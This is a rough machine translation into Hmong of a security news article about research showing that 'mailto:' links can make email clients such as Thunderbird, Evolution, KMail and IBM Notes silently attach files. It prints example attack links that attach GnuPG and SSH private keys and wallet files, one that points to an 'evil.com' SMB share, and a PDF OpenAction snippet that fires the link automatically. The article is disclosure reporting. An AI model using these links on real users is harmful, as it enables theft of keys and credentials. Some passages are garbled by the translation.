Cov kws tshawb fawb los ntawm Ruhr University Bochum (Lub Tebchaws Yelemees) () tus cwj pwm ntawm cov neeg xa ntawv thaum ua "mailto:" txuas nrog cov kev txwv siab heev. Tsib ntawm nees nkaum tus neeg siv email tau tshuaj xyuas tau yooj yim rau qhov kev tawm tsam uas tau hloov pauv cov peev txheej siv qhov "ntxiv" parameter. Ib qho ntxiv rau XNUMX tus neeg siv email tau yooj yim rau PGP thiab S / MIME qhov hloov pauv qhov tseem ceeb, thiab peb tus neeg siv tau yooj yim rau kev tawm tsam kom rho tawm cov ntsiab lus ntawm cov lus zais.
Txuas Β«"yog siv los automate qhov qhib ntawm tus neeg siv email txhawm rau sau tsab ntawv mus rau tus neeg nyob hauv qhov txuas. Ntxiv nrog rau qhov chaw nyob, koj tuaj yeem hais qhia cov kev txwv ntxiv raws li ib feem ntawm qhov txuas, xws li cov ntsiab lus ntawm tsab ntawv thiab tus qauv rau cov ntsiab lus raug. Lub tswv yim tawm tsam manipulates qhov "ntxiv" parameter, uas tso cai rau koj mus txuas ib qho txuas rau cov lus generated.
Mail cov neeg siv khoom Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) thiab Pegasus Mail yog qhov yooj yim rau kev tawm tsam tsis tseem ceeb uas tso cai rau koj tuaj yeem txuas. tej ntaub ntawv hauv zos, teev ntawm qhov txuas xws li "mailto:?attach=path_to_file". Cov ntaub ntawv txuas nrog yam tsis muaj kev ceeb toom, yog li tsis muaj kev saib xyuas tshwj xeeb, tus neeg siv yuav tsis pom tias tsab ntawv yuav raug xa nrog daim ntawv txuas.
Piv txwv li, siv qhov txuas zoo li "mailto:[email tiv thaiv]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" koj tuaj yeem ntxig tus yuam sij ntiag tug ntawm GnuPG rau hauv tsab ntawv. Koj tuaj yeem xa cov ntsiab lus ntawm crypto hnab nyiaj (~/.bitcoin/wallet.dat), SSH yuam sij (~/.ssh/id_rsa) thiab txhua cov ntaub ntawv siv tau rau tus neeg siv. Ntxiv mus, Thunderbird tso cai rau koj mus txuas cov pab pawg ntawm cov ntaub ntawv los ntawm daim npog qhov ncauj siv tsim xws li "txuas =/tmp/*.txt".
Ntxiv rau cov ntaub ntawv hauv zos, qee tus neeg siv email txheej txheem txuas mus rau lub network cia thiab txoj hauv kev hauv IMAP server. Tshwj xeeb, IBM Notes tso cai rau koj hloov cov ntaub ntawv los ntawm lub network directory thaum ua cov kev sib txuas xws li "attach=\\evil.com\dummyfile", nrog rau cuam tshuam NTLM authentication tsis los ntawm kev xa qhov txuas mus rau SMB server tswj los ntawm tus neeg tawm tsam. (qhov kev thov yuav raug xa nrog tus neeg siv qhov kev lees paub tam sim no).
Thunderbird ua tiav cov txheej txheem thov xws li "attach=imap:///fetch> UID>/INBOX> 1/", uas tso cai rau koj xa cov ntsiab lus los ntawm folders ntawm IMAP server. Tib lub sijhawm, cov lus rov qab los ntawm IMAP, encrypted ntawm OpenPGP thiab S/MIME, tau txiav txim siab los ntawm tus neeg xa ntawv xa tuaj ua ntej xa. Cov developers ntawm Thunderbird yog txog qhov teeb meem nyob rau lub Ob Hlis thiab hauv qhov teeb meem qhov teeb meem twb tau kho lawm (Thunderbird ceg 52, 60 thiab 68 tseem muaj kev cuam tshuam).
Cov ntawv qub ntawm Thunderbird kuj tseem muaj kev cuam tshuam rau ob qhov sib txawv ntawm kev tawm tsam ntawm PGP thiab S / MIME tau thov los ntawm cov kws tshawb fawb. Tshwj xeeb, Thunderbird, nrog rau OutLook, PostBox, eM Client, MailMate thiab R2Mail2, tau raug hloov pauv tseem ceeb, tshwm sim los ntawm qhov tseeb tias tus neeg xa ntawv tau txais kev xa tuaj thiab nruab cov ntawv pov thawj tshiab xa hauv S / MIME cov lus, uas tso cai rau tus neeg tawm tsam los teeb tsa kev hloov pauv ntawm cov yuam sij pej xeem uas twb tau khaws cia los ntawm tus neeg siv.
Qhov kev tawm tsam thib ob, uas Thunderbird, PostBox thiab MailMate muaj kev cuam tshuam, tswj cov yam ntxwv ntawm lub tshuab rau kev khaws cov ntawv sau tseg thiab tso cai, siv cov ntawv xa mus, los pib decryption ntawm cov lus encrypted lossis ntxiv cov kos npe digital rau cov lus tsis txaus ntseeg, nrog rau tom qab kis ntawm qhov tshwm sim mus rau tus neeg tawm tsam IMAP server. Hauv qhov kev tawm tsam no, cov ntawv ciphertext raug xa mus los ntawm "lub cev" parameter, thiab "meta refresh" tag yog siv los pib hu rau tus neeg tawm tsam IMAP server. Piv txwv li: ' '
Txhawm rau ua tiav "mailto:" txuas yam tsis muaj kev sib cuam tshuam nrog cov neeg siv, cov ntaub ntawv tshwj xeeb tsim PDF tuaj yeem siv tau - OpenAction qhov kev txiav txim hauv PDF tso cai rau koj tuaj yeem tso tus neeg xa ntawv xa mus thaum qhib daim ntawv:
% PDF-1.5
1 ob
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 ob
<< /Type /Action /S /URI/URI (mailto:?body=ββBEGIN PGP MESSAGEββ[β¦])>>
endobj
Tau qhov twg los: opennet.ru